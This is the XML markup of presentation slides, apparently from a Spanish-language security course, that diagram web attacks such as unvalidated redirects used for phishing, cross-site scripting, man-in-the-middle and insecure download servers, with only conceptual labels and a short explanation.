                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Servidor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>descarga</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>inseguro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Google Shape;330;p22" descr="Graphic 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4509D7B-B2D0-106F-15EA-A146DF77EF19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4146816" y="3300418"/>
            <a:ext cx="952501" cy="952501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;331;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6172581F-46CC-C253-EAC0-F3A9DCC18FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158439" y="3411935"/>
            <a:ext cx="864243" cy="91728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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1007695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2CA7A-7E22-9E3D-B9F2-8599B74F2D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190EEE-756F-7298-E0B2-B0E9E39FD9FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362953" y="284271"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Redirección no validada</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{494B34E9-70D5-4DA9-04B4-7947317FC7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810" t="61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230441" y="1460277"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6EA3031-62F5-3110-8F64-534C4D63120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810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507314" y="1431834"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE42CC1-4E87-6617-E724-C74AE78A833A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915106" y="2275091"/>
            <a:ext cx="1950840" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.trusted.bien</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1DE77E6-6324-C375-AD46-328B274EC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840168" y="2330822"/>
            <a:ext cx="1507951" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.evil.mal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6227E3FE-3649-D145-917C-998E020CD3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0441" y="3651660"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{353F9E62-D564-8C46-F963-0F1CA48310FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1410453" y="3469666"/>
            <a:ext cx="1667444" cy="1442271"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1667444" cy="1442271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Graphic 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3183CEC1-02F6-100F-6C10-363F499B48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D5801BF7-42A1-9740-63EC-EE909E9523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7DF4C5FF-5966-4901-7D14-5C53451A9F43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020"/>
              <a:ext cx="1667444" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Usuarios comunes</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23B14587-9156-E886-2F67-ABCAB8B0D9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4181420" y="4604160"/>
            <a:ext cx="1050542" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Atacante</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Curved Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EE48BCC-DFD6-9003-2F58-8829ADA2D8D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1445215" y="3024356"/>
            <a:ext cx="886798" cy="3823"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">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42996DA2-BE25-E6E0-31D4-BF278ED28D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2730756" y="1083184"/>
            <a:ext cx="659453" cy="2339915"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -34665"/>
              <a:gd name="adj2" fmla="val 70843"/>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62D445CF-A717-2E14-0386-862CCCAA6A47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="1"/>
            <a:endCxn id="19" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2698393" y="4127910"/>
            <a:ext cx="1532049" cy="1336"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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7891EB7-CF50-144C-1486-4055D5E345DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001873" y="4183641"/>
            <a:ext cx="1043619" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E-mail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Graphic 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9900886C-0FFF-119B-0EFF-3961E0A955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92637" y="3595929"/>
            <a:ext cx="531981" cy="531981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{015E4363-408A-9B26-01D0-BA32E5AAF555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873496" y="1354399"/>
            <a:ext cx="5561825" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0"/>
              <a:t>Sitios que permiten redirecciones sin restricciones pueden facilitar ataques de phishing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0"/>
              <a:t>El usuario confía en la primera parte de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0"/>
              <a:t>, para luego traicionar esta confianza, redireccionando al visitante a la página maliciosa.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{530BA6A1-72FD-E7B2-080C-5FF8147E5E2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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808857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Curved Connector 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C997FDC-BF7F-2D43-9D94-DADC0687A70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="1"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="3121919" y="2851625"/>
            <a:ext cx="851348" cy="1600363"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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3" cstate="screen">
            <a:alphaModFix amt="53000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228418" y="1512458"/>
            <a:ext cx="1605449" cy="1950423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B47C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2310230" y="285657"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192325" y="1228465"/>
            <a:ext cx="1950840" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>www.trusted.bien</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5852" y="4450653"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2310230" y="4268659"/>
            <a:ext cx="1667444" cy="1442271"/>
            <a:chOff x="1345136" y="3444526"/>
            <a:chExt cx="1667444" cy="1442271"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Graphic 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E9B8A2A-1A9D-7742-A5FF-32C355FA5C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93270576-9AC6-5147-9955-7029A4B44A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6BC41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1345136" y="4579020"/>
              <a:ext cx="1667444" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>Usuarios</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>comunes</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956831" y="5403153"/>
            <a:ext cx="1050542" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Curved Connector 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56AD4CEB-26B0-0746-B537-EFE45C343400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4212781" y="3181332"/>
            <a:ext cx="1599027" cy="939616"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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6F328B50-780E-0843-A476-174A2D6C54BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>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t="50875" r="83807"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973267" y="2496949"/>
            <a:ext cx="569219" cy="709353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Curved Connector 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54BFB6DF-C3EE-3545-BFE3-82D42039A13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="1"/>
            <a:endCxn id="54" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1592178" y="2487669"/>
            <a:ext cx="718053" cy="2257240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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3E3D49-ECEB-B84F-BA98-35B0F2D4E826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742384" y="3515154"/>
            <a:ext cx="1050542" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D214F5F5-9385-3342-8603-31907DBE720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810" t="61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232948" y="1561394"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76AE792-A9B2-5946-A45D-EE0E0BE3BA27}"/>
              </a:ext>
